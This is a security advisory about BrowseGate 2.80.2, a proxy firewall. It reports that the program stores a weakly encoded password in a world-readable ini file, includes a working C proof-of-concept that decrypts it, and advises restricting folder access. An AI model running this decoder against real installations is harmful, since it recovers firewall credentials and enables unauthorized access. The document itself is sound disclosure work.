Vulnerability

    BrowseGate

Affected

    BrowseGate 2.80.2 (others?)

Description

    Steven Alexander found following.  BrowseGate is a proxy  firewall
    from NetCPlus.  BrowseGate is sometimes installed on servers along
    with other network applications including SmartServer3 with  which
    it  is  made  to  integrate.   BrowseGate  installs  by default in
    C:\Program  Files\BrowseGate\    and  stores  it's   configuration
    information in the file brwgate.ini .  The file is accessible,  by
    default, to  all authenticated  users (authenticated  to Windows).
    The "encrypted"  password is  stored under  the 'scrnsze' setting,
    for instance

        scrnsze=Ic6li9m\

    The password encryption  is very weak.   Though it has  some other
    strange properties, the scheme works by adding a position-specific
    value  to  each  character  of  the  password.   There  are  seven
    characters that encrypt differently from the rest of the character
    set, we can only guess that it might be to throw off any  analysis
    but we are not particularly sure.  This scheme appears related  to
    the one used in SmartServer 3 but is somewhat different.  Look  at
    the code for more details.

    /* This is proof of concept code for decrypting password from BrowseGate by NetCplus */
    #include <stdio.h>
    
    
    int main() {
    
    unsigned char start[8] = { 0x27, 0x41, 0x72, 0x4a, 0x47, 0x75, 0x4b, 0x3a };
    unsigned char hash[8] = { '%', '}', 'S', 'p', '%', 'g', 'Z', '(' } ;
    /* Enter the encrypted password into hash above */
    unsigned char except[8] = { '~', ':', 'k', 'C', '@', 'n', 'D', '3' };
    unsigned char ex_order[7] = { 't', 'm', 'O', 'L', 's', 'B', 'R' };
    unsigned char pass[8];
    unsigned char i;
    unsigned char range;
    
    if(hash[0] >= '!' && hash[0] <= '&')
	    hash[0]=(hash[0] - 0x20) + 0x7e;
    for(i=0;i<8;i++) {
      if(hash[i] >= except[i] && hash[i] <= (except[i] + 6) ) {
	      pass[i]=ex_order[ (hash[i] - except[i]) ]; }
      else {
	      if(hash[i] < start[i]) {
		      hash[i]+=0x5e;
		      }
  	      pass[i]=hash[i] - start[i] + '!';
    
  	    if(pass[i] >= 'B')
	      pass[i]+=1;
	    if(pass[i] >= 'L')
	      pass[i]+=1;
	    if(pass[i] >= 'O')
	      pass[i]+=1;
	    if(pass[i] >= 'R')
	      pass[i]+=1;
	    if(pass[i] >= 'm')
	      pass[i]+=1;
        if(pass[i] >= 's')
          pass[i]+=1;
	    if(pass[i] >= 't')
	      pass[i]+=1;
    
      }
    }
    
    printf("The password is:\n\t");
    for(i=0;i<8;i++) {
      printf("%c ", pass[i]);
    }
    printf("\n");
    return 0;
    }

Solution

    The vendor was contacted in  regards to a previous security  issue
    with  another  product.   Unfortunately,  the  vendor  acted in an
    extremely  unprofessional  manner.   In  addition  to  denying the
    problem, they responded with  insults and implied threats  against
    me.  At this point, it is  up to the customers of this   vendor to
    ask for what they deserve:  a reasonable measure of security.   In
    the meantime, it would be useful to restrict access to the  folder
    in which BrowseGate is installed.